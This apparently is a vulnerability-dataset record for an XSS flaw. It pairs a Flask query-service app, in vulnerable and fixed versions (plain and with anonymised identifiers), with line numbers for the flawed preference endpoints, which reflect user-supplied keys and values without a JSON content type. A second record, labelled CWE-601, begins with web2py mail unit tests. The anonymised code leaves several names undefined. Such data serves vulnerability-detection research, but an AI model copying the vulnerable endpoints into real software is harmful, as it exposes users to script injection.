headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/query/<int:query_id>/meta")
def output_query_meta(query_id):
query = g.conn.session.query(Query).get(query_id)
if not query:
return Response('No such query id', status=404)
return Response(json.dumps(
{
'latest_run': query.latest_rev.latest_run,
'latest_rev': query.latest_rev,
'query': query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@app.route("/explain/<int:connection_id>")
def output_explain(connection_id):
cur = g.conn.replica.cursor()
try:
cur.execute('SHOW EXPLAIN FOR %d;' % connection_id)
except cur.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
# 1094 = Unknown thread id
# 1915, 1933 = Target is not running an EXPLAINable command
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in cur.description],
'rows': cur.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@app.route("/api/preferences/get/<key>")
def pref_get(key):
if get_user() is None:
return "Authentication required", 401
if key in get_preferences():
return Response(
json.dumps({'key': key, 'value': get_preferences()[key]}),
mimetype='application/json'
)
else:
return Response(
json.dumps({'key': key, 'error': 'novalue'}),
mimetype='application/json'
)
@app.route("/api/preferences/set/<key>/<value>")
def pref_set(key, value):
if get_user() is None:
return "Authentication required", 401
get_preferences()[key] = (None if value == 'null' else value)
return Response(
json.dumps({'key': key, 'success': ''}),
mimetype='application/json'
), 201
if __name__ == '__main__':
app.run(port=5000, host="0.0.0.0")
| xss | {
"code": [
" return Response(json.dumps({'key': key, 'value': get_preferences()[key]}))",
" return Response(json.dumps({'key': key, 'error': 'novalue'}))",
" return Response(json.dumps({'key': key, 'success': ''})), 201"
],
"line_no": [
401,
403,
412
]
} | {
"code": [
" return Response(",
" json.dumps({'key': key, 'value': get_preferences()[key]}),",
" mimetype='application/json'",
" return Response(",
" json.dumps({'key': key, 'error': 'novalue'}),",
" mimetype='application/json'",
" )",
" return Response(",
" json.dumps({'key': key, 'success': ''}),",
" mimetype='application/json'",
" ), 201"
],
"line_no": [
401,
402,
403,
406,
407,
408,
409,
418,
419,
420,
421
]
} | import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, VAR_31
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
VAR_0 = Flask(__name__)
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
pass
VAR_0.register_blueprint(auth)
VAR_0.register_blueprint(health_blueprint)
VAR_0.register_blueprint(user_blueprint)
VAR_0.register_blueprint(templatehelpers)
VAR_1 = Connections(VAR_0.config)
VAR_0.session_interface = RedisSessionInterface(VAR_1.redis)
class CLASS_0(RangeBasedPagination):
def FUNC_20(self, VAR_12, VAR_13):
VAR_32 = dict(request.args)
VAR_32.update({
'from': VAR_12, 'limit': VAR_13})
return url_for('query_runs_all', **dict(
[(VAR_10, VAR_11) for VAR_10, VAR_11 in list(VAR_32.items())])
)
def FUNC_21(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def FUNC_22(self):
if self.page_key is None:
return
VAR_33 = g.conn.session.query(Query).get(self.page_key)
if VAR_33:
VAR_37 = VAR_33.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > VAR_37)
else:
self.queryset = self.queryset.filter(
QueryRun.id < VAR_37)
@VAR_0.before_request
def FUNC_0():
g.conn = Connections(VAR_0.config)
@VAR_0.teardown_request
def FUNC_1(VAR_2=None):
g.conn.close_all()
@VAR_0.route("/")
def FUNC_2():
return render_template("landing.html", user=get_user())
@VAR_0.route("/api/VAR_14/unstar", methods=["POST"])
def FUNC_3():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(VAR_34)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@VAR_0.route("/api/VAR_14/star", methods=["POST"])
def FUNC_4():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = Star()
VAR_34.user = get_user()
VAR_34.query = VAR_14
g.conn.session.add(VAR_34)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@VAR_0.route("/VAR_14/new")
def FUNC_5():
if get_user() is None:
return redirect("/login?next=/VAR_14/new")
VAR_14 = Query()
VAR_14.user = get_user()
g.conn.session.add(VAR_14)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/fork/<int:VAR_3>")
def FUNC_6(VAR_3):
if get_user() is None:
return redirect("/login?next=fork/{VAR_3}".format(VAR_3=id))
VAR_14 = Query()
VAR_14.user = get_user()
VAR_15 = g.conn.session.query(Query).filter(Query.id == VAR_3).one()
VAR_14.title = VAR_15.title
VAR_14.parent_id = VAR_15.id
VAR_14.description = VAR_15.description
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=VAR_15.latest_rev.text)
VAR_14.latest_rev = VAR_16
g.conn.session.add(VAR_14)
g.conn.session.add(VAR_16)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/VAR_14/<int:VAR_4>")
def FUNC_7(VAR_4):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_17 = get_user() is not None and get_user().id == VAR_14.user_id
VAR_18 = False
if get_user():
VAR_18 = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == VAR_4).scalar() == 1
VAR_19 = {
'query_id': VAR_14.id,
'can_edit': VAR_17,
'is_starred': VAR_18,
'published': VAR_14.published,
'preferences': VAR_31()
}
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run_id:
VAR_19['qrun_id'] = VAR_14.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
VAR_14=query,
VAR_19=jsvars,
latest_rev=VAR_14.latest_rev
)
@VAR_0.route('/VAR_14/<int:VAR_4>/VAR_35/latest/<string:VAR_5>/<string:VAR_6>')
def FUNC_8(VAR_4, VAR_5, VAR_6):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_7 = VAR_14.latest_rev.latest_run_id
VAR_20 = redirect(
url_for('output_result', VAR_7=qrun_id,
VAR_5=resultset_id, VAR_6=format,
_external=True, _scheme='https')
)
VAR_20.headers.add('Access-Control-Allow-Origin', '*')
return VAR_20
@VAR_0.route('/api/VAR_14/meta', methods=['POST'])
def FUNC_9():
if get_user() is None:
return "Authentication required", 401
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
VAR_14.title = request.form['title']
if 'published' in request.form:
VAR_14.published = request.form['published'] == '1'
if 'description' in request.form:
VAR_14.description = request.form['description']
g.conn.session.add(VAR_14)
g.conn.session.commit()
return json.dumps({'id': VAR_14.id})
@VAR_0.route('/api/VAR_14/run', methods=['POST'])
def FUNC_10():
if get_user() is None:
return "Authentication required", 401
VAR_21 = request.form['text']
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run:
VAR_35 = worker.run_query.AsyncResult(VAR_14.latest_rev.latest_run.task_id)
if not VAR_35.ready():
VAR_35.revoke(terminate=True)
VAR_14.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(VAR_14.latest_rev.latest_run)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=text)
VAR_14.latest_rev = VAR_16
VAR_22 = QueryRun()
VAR_22.rev = VAR_16
VAR_22.status = QueryRun.STATUS_QUEUED
g.conn.session.add(VAR_22)
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16.latest_run = VAR_22
VAR_22.task_id = worker.run_query.delay(VAR_22.id).task_id
g.conn.session.add(VAR_16)
g.conn.session.add(VAR_22)
g.conn.session.commit()
return json.dumps({
'qrun_id': VAR_22.id
})
@VAR_0.route("/VAR_14/runs/all")
def FUNC_11():
VAR_23 = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
VAR_24 = 'all'
if request.args.get('published') == 'true':
VAR_23 = queries.filter(Query.published)
VAR_24 = 'published'
VAR_13 = int(request.args.get(
'limit', VAR_0.config.get('QUERY_RESULTS_PER_PAGE', 50)))
VAR_23, VAR_25, VAR_26 = CLASS_0(
VAR_23, request.args.get('from'), VAR_13,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), VAR_23=queries,
VAR_25=prev_link, VAR_26=next_link,
VAR_24=queries_filter)
@VAR_0.route('/run/<int:VAR_7>/status')
def FUNC_12(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_22 id', status=404)
return Response(json.dumps({
'status': VAR_27.status_message,
'extra': json.loads(VAR_27.extra_info or '{}'),
'timestamp': VAR_27.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@VAR_0.route("/run/<int:VAR_7>/output/<int:VAR_5>/<string:VAR_6>")
def FUNC_13(VAR_7, VAR_5=0, VAR_6='json'):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
VAR_28 = Response('No such VAR_22 id', status=404)
else:
VAR_36 = SQLiteResultReader(VAR_27, VAR_0.config['OUTPUT_PATH_TEMPLATE'])
try:
VAR_28 = output.get_formatted_response(VAR_6, VAR_27, VAR_36, VAR_5)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
VAR_28 = Response('No such resultset id', status=404)
else:
raise
VAR_28.headers['Access-Control-Allow-Origin'] = '*'
return VAR_28
@VAR_0.route("/run/<int:VAR_7>/meta")
def FUNC_14(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_14 run id', status=404)
return Response(json.dumps(
{
'run': VAR_27,
'rev': VAR_27.rev,
'query': VAR_27.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_29/<int:VAR_8>/meta")
def FUNC_15(VAR_8):
VAR_29 = g.conn.session.query(QueryRevision).get(VAR_8)
if not VAR_29:
return Response('No such VAR_14 revision id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_29.latest_run,
'rev': VAR_29,
'query': VAR_29.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_14/<int:VAR_4>/meta")
def FUNC_16(VAR_4):
VAR_14 = g.conn.session.query(Query).get(VAR_4)
if not VAR_14:
return Response('No such VAR_14 id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_14.latest_rev.latest_run,
'latest_rev': VAR_14.latest_rev,
'query': VAR_14
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/explain/<int:VAR_9>")
def FUNC_17(VAR_9):
VAR_30 = g.conn.replica.cursor()
try:
VAR_30.execute('SHOW EXPLAIN FOR %d;' % VAR_9)
except VAR_30.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in VAR_30.description],
'rows': VAR_30.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@VAR_0.route("/api/preferences/get/<VAR_10>")
def FUNC_18(VAR_10):
if get_user() is None:
return "Authentication required", 401
if VAR_10 in VAR_31():
return Response(json.dumps({'key': VAR_10, 'value': VAR_31()[VAR_10]}))
else:
return Response(json.dumps({'key': VAR_10, 'error': 'novalue'}))
@VAR_0.route("/api/preferences/set/<VAR_10>/<VAR_11>")
def FUNC_19(VAR_10, VAR_11):
if get_user() is None:
return "Authentication required", 401
VAR_31()[VAR_10] = (None if VAR_11 == 'null' else VAR_11)
return Response(json.dumps({'key': VAR_10, 'success': ''})), 201
if __name__ == '__main__':
VAR_0.run(port=5000, host="0.0.0.0")
| import json
import os
import sqlite3
from flask import Flask, render_template, redirect, g, request, url_for, Response
from sqlalchemy import desc, func
from sqlalchemy.exc import IntegrityError
import yaml
from . import worker, output
from .connections import Connections
from .login import auth
from .models.user import UserGroup
from .models.query import Query
from .models.queryrevision import QueryRevision
from .models.queryrun import QueryRun
from .models.star import Star
from .redissession import RedisSessionInterface
from .results import SQLiteResultReader
from .user import user_blueprint, get_user, VAR_31
from .utils import json_formatter
from .utils import monkey as _unused # noqa: F401
from .utils.pagination import RangeBasedPagination
from .health import health_blueprint
from .webhelpers import templatehelpers
__dir__ = os.path.dirname(__file__)
VAR_0 = Flask(__name__)
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../default_config.yaml"))))
try:
VAR_0.config.update(yaml.load(open(os.path.join(__dir__, "../config.yaml"))))
except IOError:
pass
VAR_0.register_blueprint(auth)
VAR_0.register_blueprint(health_blueprint)
VAR_0.register_blueprint(user_blueprint)
VAR_0.register_blueprint(templatehelpers)
VAR_1 = Connections(VAR_0.config)
VAR_0.session_interface = RedisSessionInterface(VAR_1.redis)
class CLASS_0(RangeBasedPagination):
def FUNC_20(self, VAR_12, VAR_13):
VAR_32 = dict(request.args)
VAR_32.update({
'from': VAR_12, 'limit': VAR_13})
return url_for('query_runs_all', **dict(
[(VAR_10, VAR_11) for VAR_10, VAR_11 in list(VAR_32.items())])
)
def FUNC_21(self):
if self.direction == 'next':
self.queryset = self.queryset.order_by(desc(QueryRun.timestamp))
else:
self.queryset = self.queryset.order_by(QueryRun.timestamp)
def FUNC_22(self):
if self.page_key is None:
return
VAR_33 = g.conn.session.query(Query).get(self.page_key)
if VAR_33:
VAR_37 = VAR_33.latest_rev.latest_run.id
if self.direction == 'prev':
self.queryset = self.queryset.filter(
QueryRun.id > VAR_37)
else:
self.queryset = self.queryset.filter(
QueryRun.id < VAR_37)
@VAR_0.before_request
def FUNC_0():
g.conn = Connections(VAR_0.config)
@VAR_0.teardown_request
def FUNC_1(VAR_2=None):
g.conn.close_all()
@VAR_0.route("/")
def FUNC_2():
return render_template("landing.html", user=get_user())
@VAR_0.route("/api/VAR_14/unstar", methods=["POST"])
def FUNC_3():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = g.conn.session.query(Star)\
.filter(Star.query_id == request.form['query_id'])\
.filter(Star.user_id == get_user().id)\
.one()
g.conn.session.delete(VAR_34)
g.conn.session.commit()
return ""
else:
return "Query not found", 404
@VAR_0.route("/api/VAR_14/star", methods=["POST"])
def FUNC_4():
if get_user() is None:
return "Unauthorized access", 403
VAR_14 = g.conn.session.query(Query).get(request.form['query_id'])
if VAR_14:
VAR_34 = Star()
VAR_34.user = get_user()
VAR_34.query = VAR_14
g.conn.session.add(VAR_34)
try:
g.conn.session.commit()
except IntegrityError as e:
if e.args[0] == 1062: # Duplicate
g.conn.session.rollback()
else:
raise
return ""
else:
return "Query not found", 404
@VAR_0.route("/VAR_14/new")
def FUNC_5():
if get_user() is None:
return redirect("/login?next=/VAR_14/new")
VAR_14 = Query()
VAR_14.user = get_user()
g.conn.session.add(VAR_14)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/fork/<int:VAR_3>")
def FUNC_6(VAR_3):
if get_user() is None:
return redirect("/login?next=fork/{VAR_3}".format(VAR_3=id))
VAR_14 = Query()
VAR_14.user = get_user()
VAR_15 = g.conn.session.query(Query).filter(Query.id == VAR_3).one()
VAR_14.title = VAR_15.title
VAR_14.parent_id = VAR_15.id
VAR_14.description = VAR_15.description
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=VAR_15.latest_rev.text)
VAR_14.latest_rev = VAR_16
g.conn.session.add(VAR_14)
g.conn.session.add(VAR_16)
g.conn.session.commit()
return redirect(url_for('query_show', VAR_4=VAR_14.id))
@VAR_0.route("/VAR_14/<int:VAR_4>")
def FUNC_7(VAR_4):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_17 = get_user() is not None and get_user().id == VAR_14.user_id
VAR_18 = False
if get_user():
VAR_18 = g.conn.session.query(func.count(Star.id))\
.filter(Star.user_id == get_user().id)\
.filter(Star.query_id == VAR_4).scalar() == 1
VAR_19 = {
'query_id': VAR_14.id,
'can_edit': VAR_17,
'is_starred': VAR_18,
'published': VAR_14.published,
'preferences': VAR_31()
}
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run_id:
VAR_19['qrun_id'] = VAR_14.latest_rev.latest_run_id
return render_template(
"query/view.html",
user=get_user(),
VAR_14=query,
VAR_19=jsvars,
latest_rev=VAR_14.latest_rev
)
@VAR_0.route('/VAR_14/<int:VAR_4>/VAR_35/latest/<string:VAR_5>/<string:VAR_6>')
def FUNC_8(VAR_4, VAR_5, VAR_6):
VAR_14 = g.conn.session.query(Query).filter(Query.id == VAR_4).one()
VAR_7 = VAR_14.latest_rev.latest_run_id
VAR_20 = redirect(
url_for('output_result', VAR_7=qrun_id,
VAR_5=resultset_id, VAR_6=format,
_external=True, _scheme='https')
)
VAR_20.headers.add('Access-Control-Allow-Origin', '*')
return VAR_20
@VAR_0.route('/api/VAR_14/meta', methods=['POST'])
def FUNC_9():
if get_user() is None:
return "Authentication required", 401
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id:
return "Authorization denied", 403
if 'title' in request.form:
VAR_14.title = request.form['title']
if 'published' in request.form:
VAR_14.published = request.form['published'] == '1'
if 'description' in request.form:
VAR_14.description = request.form['description']
g.conn.session.add(VAR_14)
g.conn.session.commit()
return json.dumps({'id': VAR_14.id})
@VAR_0.route('/api/VAR_14/run', methods=['POST'])
def FUNC_10():
if get_user() is None:
return "Authentication required", 401
VAR_21 = request.form['text']
VAR_14 = g.conn.session.query(Query).filter(Query.id == request.form['query_id']).one()
if VAR_14.user_id != get_user().id or \
g.conn.session.query(UserGroup).filter(UserGroup.user_id == get_user().id) \
.filter(UserGroup.group_name == 'blocked').first():
return "Authorization denied", 403
if VAR_14.latest_rev and VAR_14.latest_rev.latest_run:
VAR_35 = worker.run_query.AsyncResult(VAR_14.latest_rev.latest_run.task_id)
if not VAR_35.ready():
VAR_35.revoke(terminate=True)
VAR_14.latest_rev.latest_run.status = QueryRun.STATUS_SUPERSEDED
g.conn.session.add(VAR_14.latest_rev.latest_run)
g.conn.session.commit()
VAR_16 = QueryRevision(VAR_4=VAR_14.id, VAR_21=text)
VAR_14.latest_rev = VAR_16
VAR_22 = QueryRun()
VAR_22.rev = VAR_16
VAR_22.status = QueryRun.STATUS_QUEUED
g.conn.session.add(VAR_22)
g.conn.session.add(VAR_14)
g.conn.session.commit()
VAR_16.latest_run = VAR_22
VAR_22.task_id = worker.run_query.delay(VAR_22.id).task_id
g.conn.session.add(VAR_16)
g.conn.session.add(VAR_22)
g.conn.session.commit()
return json.dumps({
'qrun_id': VAR_22.id
})
@VAR_0.route("/VAR_14/runs/all")
def FUNC_11():
VAR_23 = g.conn.session.query(Query)\
.join(Query.latest_rev).join(QueryRevision.latest_run)
VAR_24 = 'all'
if request.args.get('published') == 'true':
VAR_23 = queries.filter(Query.published)
VAR_24 = 'published'
VAR_13 = int(request.args.get(
'limit', VAR_0.config.get('QUERY_RESULTS_PER_PAGE', 50)))
VAR_23, VAR_25, VAR_26 = CLASS_0(
VAR_23, request.args.get('from'), VAR_13,
request.path,
request.referrer, dict(request.args)).paginate()
return render_template(
"query/list.html", user=get_user(), VAR_23=queries,
VAR_25=prev_link, VAR_26=next_link,
VAR_24=queries_filter)
@VAR_0.route('/run/<int:VAR_7>/status')
def FUNC_12(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_22 id', status=404)
return Response(json.dumps({
'status': VAR_27.status_message,
'extra': json.loads(VAR_27.extra_info or '{}'),
'timestamp': VAR_27.timestamp.strftime('%s')
}), mimetype='application/json', headers={'Access-Control-Allow-Origin': '*'})
@VAR_0.route("/run/<int:VAR_7>/output/<int:VAR_5>/<string:VAR_6>")
def FUNC_13(VAR_7, VAR_5=0, VAR_6='json'):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
VAR_28 = Response('No such VAR_22 id', status=404)
else:
VAR_36 = SQLiteResultReader(VAR_27, VAR_0.config['OUTPUT_PATH_TEMPLATE'])
try:
VAR_28 = output.get_formatted_response(VAR_6, VAR_27, VAR_36, VAR_5)
except sqlite3.OperationalError as e:
if e.args[0].startswith('no such table'):
VAR_28 = Response('No such resultset id', status=404)
else:
raise
VAR_28.headers['Access-Control-Allow-Origin'] = '*'
return VAR_28
@VAR_0.route("/run/<int:VAR_7>/meta")
def FUNC_14(VAR_7):
VAR_27 = g.conn.session.query(QueryRun).get(VAR_7)
if not VAR_27:
return Response('No such VAR_14 run id', status=404)
return Response(json.dumps(
{
'run': VAR_27,
'rev': VAR_27.rev,
'query': VAR_27.rev.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_29/<int:VAR_8>/meta")
def FUNC_15(VAR_8):
VAR_29 = g.conn.session.query(QueryRevision).get(VAR_8)
if not VAR_29:
return Response('No such VAR_14 revision id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_29.latest_run,
'rev': VAR_29,
'query': VAR_29.query
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/VAR_14/<int:VAR_4>/meta")
def FUNC_16(VAR_4):
VAR_14 = g.conn.session.query(Query).get(VAR_4)
if not VAR_14:
return Response('No such VAR_14 id', status=404)
return Response(json.dumps(
{
'latest_run': VAR_14.latest_rev.latest_run,
'latest_rev': VAR_14.latest_rev,
'query': VAR_14
}, default=json_formatter),
mimetype='application/json',
headers={'Access-Control-Allow-Origin': '*'},
)
@VAR_0.route("/explain/<int:VAR_9>")
def FUNC_17(VAR_9):
VAR_30 = g.conn.replica.cursor()
try:
VAR_30.execute('SHOW EXPLAIN FOR %d;' % VAR_9)
except VAR_30.InternalError as e:
if e.args[0] in [1094, 1915, 1933]:
return Response(json.dumps(
{
'headers': ['Error'],
'rows': [['Hmm... Is the SQL actually running?!']],
}, default=json_formatter),
mimetype='application/json',
)
else:
raise
else:
return Response(json.dumps(
{
'headers': [c[0] for c in VAR_30.description],
'rows': VAR_30.fetchall(),
}, default=json_formatter),
mimetype='application/json',
)
@VAR_0.route("/api/preferences/get/<VAR_10>")
def FUNC_18(VAR_10):
if get_user() is None:
return "Authentication required", 401
if VAR_10 in VAR_31():
return Response(
json.dumps({'key': VAR_10, 'value': VAR_31()[VAR_10]}),
mimetype='application/json'
)
else:
return Response(
json.dumps({'key': VAR_10, 'error': 'novalue'}),
mimetype='application/json'
)
@VAR_0.route("/api/preferences/set/<VAR_10>/<VAR_11>")
def FUNC_19(VAR_10, VAR_11):
if get_user() is None:
return "Authentication required", 401
VAR_31()[VAR_10] = (None if VAR_11 == 'null' else VAR_11)
return Response(
json.dumps({'key': VAR_10, 'success': ''}),
mimetype='application/json'
), 201
if __name__ == '__main__':
VAR_0.run(port=5000, host="0.0.0.0")
| [
4,
9,
26,
28,
34,
36,
41,
44,
45,
54,
60,
73,
74,
78,
79,
83,
84,
88,
89,
105,
106,
127,
128,
138,
139,
152,
159,
160,
177,
180,
188,
189,
194,
200,
203,
204,
209,
211,
214,
224,
225,
232,
237,
245,
248,
249,
250,
251,
255,
267,
268,
287,
288,
299,
300,
317,
318,
333,
334,
349,
350,
365,
366,
374,
375,
393,
394,
399,
404,
405,
410,
413,
414,
417
] | [
4,
9,
26,
28,
34,
36,
41,
44,
45,
54,
60,
73,
74,
78,
79,
83,
84,
88,
89,
105,
106,
127,
128,
138,
139,
152,
159,
160,
177,
180,
188,
189,
194,
200,
203,
204,
209,
211,
214,
224,
225,
232,
237,
245,
248,
249,
250,
251,
255,
267,
268,
287,
288,
299,
300,
317,
318,
333,
334,
349,
350,
365,
366,
374,
375,
393,
394,
399,
410,
411,
416,
422,
423,
426
] |
4CWE-601
| #!/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for gluon.tools
"""
import os
import sys
import shutil
import tempfile
import smtplib
import datetime
import unittest
DEFAULT_URI = os.getenv('DB', 'sqlite:memory')
from gluon.dal import DAL, Field
from pydal.objects import Table
from gluon import tools
from gluon.tools import Auth, Mail, Recaptcha2, prettydate, Expose
from gluon._compat import PY2, to_bytes
from gluon.globals import Request, Response, Session
from gluon.storage import Storage
from gluon.languages import TranslatorFactory
from gluon.http import HTTP
from gluon import SPAN, H3, TABLE, TR, TD, A, URL, current
IS_IMAP = "imap" in DEFAULT_URI
class TestMail(unittest.TestCase):
"""
Test the Mail class.
"""
class Message(object):
def __init__(self, sender, to, payload):
self.sender = sender
self.to = to
self.payload = payload
self._parsed_payload = None
@property
def parsed_payload(self):
if self._parsed_payload is None:
import email
self._parsed_payload = email.message_from_string(self.payload)
return self._parsed_payload
class DummySMTP(object):
"""
Dummy smtp server
NOTE: Test methods should take care of always leaving inbox and users empty when they finish.
"""
inbox = []
users = {}
def __init__(self, address, port, **kwargs):
self.address = address
self.port = port
self.has_quit = False
self.tls = False
def login(self, username, password):
if username not in self.users or self.users[username] != password:
raise smtplib.SMTPAuthenticationError
self.username = username
self.password = password
def sendmail(self, sender, to, payload):
self.inbox.append(TestMail.Message(sender, to, payload))
def quit(self):
self.has_quit = True
def ehlo(self, hostname=None):
pass
def starttls(self):
self.tls = True
def setUp(self):
self.original_SMTP = smtplib.SMTP
self.original_SMTP_SSL = smtplib.SMTP_SSL
smtplib.SMTP = TestMail.DummySMTP
smtplib.SMTP_SSL = TestMail.DummySMTP
def tearDown(self):
smtplib.SMTP = self.original_SMTP
smtplib.SMTP_SSL = self.original_SMTP_SSL
def test_hello_world(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
message = TestMail.DummySMTP.inbox.pop()
self.assertEqual(message.sender, mail.settings.sender)
self.assertEqual(message.to, ['somebody@example.com'])
header = "To: somebody@example.com\nReply-To: us@example.com\nSubject: hello\n"
self.assertTrue(header in message.payload)
self.assertTrue(message.payload.endswith('world'))
def test_failed_login(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertFalse(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
def test_login(self):
TestMail.DummySMTP.users['username'] = 'password'
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.login = 'username:password'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='world'))
del TestMail.DummySMTP.users['username']
TestMail.DummySMTP.inbox.pop()
def test_html(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
subject='hello',
# If reply_to is omitted, then mail.settings.sender is used
reply_to='us@example.com',
message='<html><head></head><body></body></html>'))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue('Content-Type: text/html' in message.payload)
def test_alternative(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
self.assertTrue(mail.send(to=['somebody@example.com'],
message=('Text only', '<html><pre>HTML Only</pre></html>')))
message = TestMail.DummySMTP.inbox.pop()
self.assertTrue(message.parsed_payload.is_multipart())
self.assertTrue(message.parsed_payload.get_content_type() == 'multipart/alternative')
parts = message.parsed_payload.get_payload()
self.assertTrue('Text only' in parts[0].as_string())
self.assertTrue('<html><pre>HTML Only</pre></html>' in parts[1].as_string())
def test_ssl(self):
mail = Mail()
mail.settings.server = 'smtp.example.com:25'
mail.settings.sender = 'you@example.com'
mail.settings.ssl = True
self.assertTrue(mail.send(to=['somebody@example.com'],
